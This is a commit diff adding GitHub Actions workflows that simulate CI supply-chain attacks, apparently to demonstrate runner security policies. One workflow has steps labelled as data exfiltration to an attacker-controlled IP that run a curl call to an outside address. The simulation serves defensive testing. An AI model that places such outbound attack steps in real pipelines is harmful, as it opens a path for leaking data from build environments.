Skip to content

Commit 00617eb

Browse files
committed
Add more ARC workflows
1 parent f268f74 commit 00617eb

4 files changed

Lines changed: 40 additions & 2 deletions

File tree

.github/workflows/arc-codecov-simulation.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
name: ARC Codecov Simulation
1+
name: 3. ARC Codecov Simulation
22
on:
33
workflow_dispatch:
44

.github/workflows/arc-solarwinds-simulation.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
name: ARC SolarWinds Simulation
1+
name: 4. ARC SolarWinds Simulation
22
on:
33
workflow_dispatch:
44

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
name: 1. Zero-effort Observability
2+
3+
on:
4+
workflow_dispatch:
5+
push:
6+
7+
jobs:
8+
observability:
9+
runs-on: self-hosted
10+
permissions:
11+
contents: read
12+
steps:
13+
- uses: actions/checkout@v2
14+
15+
- name: Build Docker image
16+
run: docker build .
Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
name: 2. Secure-By-Default ARC Cluster-Level Policy
2+
on:
3+
workflow_dispatch:
4+
push:
5+
6+
jobs:
7+
direct-ip-hosted:
8+
runs-on: ubuntu-latest
9+
steps:
10+
- uses: actions/checkout@v3
11+
12+
# Codecov Scenario: Exfiltrate data to attacker's IP address
13+
- name: Data Exfiltration To Attacker Controlled IP address
14+
run: curl 104.16.209.12 -L
15+
direct-ip-arc:
16+
runs-on: self-hosted
17+
steps:
18+
- uses: actions/checkout@v3
19+
20+
# Codecov Scenario: Exfiltrate data to attacker's IP address
21+
- name: Data Exfiltration To Attacker Controlled IP address
22+
run: curl 104.16.209.12 -L

0 commit comments

Comments
 (0)